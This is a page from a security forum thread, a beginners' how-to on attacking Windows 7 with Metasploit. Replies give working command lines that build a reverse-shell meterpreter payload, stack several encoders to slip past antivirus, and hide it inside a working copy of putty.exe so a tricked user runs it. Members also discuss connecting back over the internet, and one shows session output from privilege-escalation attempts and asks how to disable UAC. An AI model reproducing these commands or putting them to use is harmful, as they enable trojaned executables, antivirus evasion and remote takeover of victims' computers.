Page 2 of 4 FirstFirst 1234 LastLast
Results 11 to 20 of 37

Thread: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

  1. #11
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    So u like to use the truecrypt.exe nice lol one of a few that work nice.

    For a great tutorial series on metasploit complete google metasploit megaprimer securitytube, best ive seen.
    Last edited by pentest09; 09-24-2010 at 01:34 PM.

  2. #12
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    15

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Wouldn't hurt to include a link to Metasploit Unleashed at the bottom of the guide to point beginners to the right place to take their followup learning to.

    Metasploit Unleashed - Mastering the Framework

  3. #13
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    11

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Quote Originally Posted by farshadbat View Post
    hi,im sorry for my amature question.im new one to metasploit

    i dont get it this section
    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADRESS INT./EXT.] LPORT=[YOUR PORT] R | ./msfencode -c [NUMBER - How many time it will be encoded] -e x86/shikata_ga_nai -x /root/[SOFTWARE_NAME].exe -t exe > /root/[NEW_SOFTWARE_NAME].exe
    what EXE i need it ?

    You need to find a exe file like putty or tcpview to encode the backdoor into.

  4. #14
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Quote Originally Posted by xibit1987 View Post
    About backdooring an exe: I already have that in the "Create the exploit". The first code box in the guide. i use encode here and i also explain i LITTLE bit about the error you can get I didn't go directly into details, but if thats what you guys want i can do that too By the way, have any of you got the "-k" option to work yet, so that the exe your backdooring still work? If yes, pleas post an example code

    And again, I'm a beginner so please correct me if have understood anything wrong or I explained anything in the wrong way!

    I thank you all for the kind words

    Actually the -k option is what I am specifically referring to with my backdooring comment. As this is a client side attack, tricking/social engineering the user is everything so keeping your the backdoored exe working can be key sometimes. Not all executables work as templates with the -k option or possibly even as templates in the first place.

    Also bear in mind that this example code here did not pass my current avast. I am moving this week and don't have time to re-work the encoding so it does. It did formerly, however the executable made with this multi-encoding command string has been uploaded to virustotal for testing, as really the command was simple for testing the workings of running multiple encoders. I also developed this particular string some time ago.

    The code in this case is simply an example that yes multiple encoders can still be used when backdooring an exe and even still keeping template exe working.

    Code:
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.25.26
     LPORT=1417 R | msfencode -e x86/shikata_ga_nai -c 3 -t raw | msfencode -e
     x86/call4_dword_xor -c 4 -t raw | msfencode -e x86/fnstenv_mov -c 5 -t raw |
     msfencode -e x86/countdown -c 4 -t raw | msfencode -e x86/shikata_ga_nai -c 16
     -t exe -x /root/putty.exe -k -o /root/putty-backdoored.exe
    Again, when running it with this post Avast did detect the exe and disposed of it. With avast off I am able to get a meterpreter session started. Of course modify ip address and port as needed.

  5. #15
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    4

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    i know this question lies totally out of the topic.. but do the classic metasploit payloads and exploits work for win7 target platforms?

  6. #16
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Quote Originally Posted by captainjackrana View Post
    i know this question lies totally out of the topic.. but do the classic metasploit payloads and exploits work for win7 target platforms?
    What is a classic payload and or exploit? If you mean something designed for winxp, then no they most likely do not.
    It would be a good idea for you to read up on the msfu
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  7. #17
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Hi, very useful tutorial ! I used to use SET for simplicity, but this is just great, and not that hard

    I have some questions though :
    - everything is running smooth when on the same network, but how can I use it via internet ? I have two networks, two PCs. When I try this, but using my public IP, it just fails and metasploit binds to 0.0.0.0... I tried allowing connections from outside through specific ports in my router, but same result...

    Any idea people ?

    Edit : never mind my post, it's running all smooth ! And I didn't know 0.0.0.0 meant all interfaces. As for not working forwarding port, it was just some router FW i got rid of, and it was the good way to do it !

  8. #18
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    I didnt think getsystem works on x64 for windows 7? I also have just a lot of BSOD in my testing with getting system privs... I dont understand how you did that?

    I dont see this even working on a x32

    Code:
    meterpreter > sysinfo
    Computer: WIN-MSUB6TKFKFA
    OS      : Windows 7 (Build 7600, ).
    Arch    : x86
    Language: en_US
    meterpreter > ps
    ...
    608   explorer.exe         x86   1        WIN-MSUB6TKFKFA\user  C:\Windows\Explorer.EXE
    meterpreter > migrate 608[*] Migrating to 608...[*] Migration completed successfully.
    meterpreter > getprivs
    ============================================================
    Enabled Process Privileges
    ============================================================
      SeShutdownPrivilege
      SeChangeNotifyPrivilege
      SeUndockPrivilege
    meterpreter > getsystem -t 1
    [-] priv_elevate_getsystem: Operation failed: Access is denied.
    meterpreter > getsystem -t 2
    [-] priv_elevate_getsystem: Operation failed: Access is denied.
    meterpreter > getsystem -t 3
    [-] priv_elevate_getsystem: Operation failed: Access is denied.
    meterpreter > getsystem -t 4
    ^C[-] Error running command getsystem: Interrupt
    update: this is UAC blocking access, with UAC disabled this is no longer an issue I am still stuck on how to disable UAC..?
    Last edited by spudgunman; 12-01-2010 at 06:53 AM.

  9. #19
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    4

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Very good tut and thanks for sharing this nice work.

  10. #20
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    6

    Default Riferimento: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Hi everyone. I'm italian so my english isn't correct xD
    So... i've a problem with meterpreter: when i create it it's ok.
    in lhost i set my external address and in the msfconsole my internal address but when in an other computer (it isn't in my lan) open the file nothing appends, msfconsole receives nothing. Why?
    I do all correctly but... i don't know.
    Anyone can help me?
    Thanks

    Again: Sorry for my bad english

    TheAppleMan

Page 2 of 4 FirstFirst 1234 LastLast

Similar Threads

  1. Replies: 2
    Last Post: 08-23-2010, 10:53 AM
  2. [Video] Man In The Middle (MITM) Attack (ettercap, metasploit, sbd)
    By imported_g0tmi1k in forum OLD BT4 Videos
    Replies: 6
    Last Post: 01-16-2010, 08:47 PM
  3. Replies: 2
    Last Post: 07-08-2009, 08:56 AM
  4. how to configure Metasploit Client-Side Attack
    By black02 in forum OLD Newbie Area
    Replies: 2
    Last Post: 04-09-2009, 08:03 PM
  5. Some detailed questions about WEP cracking
    By jemenake in forum OLD Wireless
    Replies: 16
    Last Post: 05-01-2007, 09:24 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •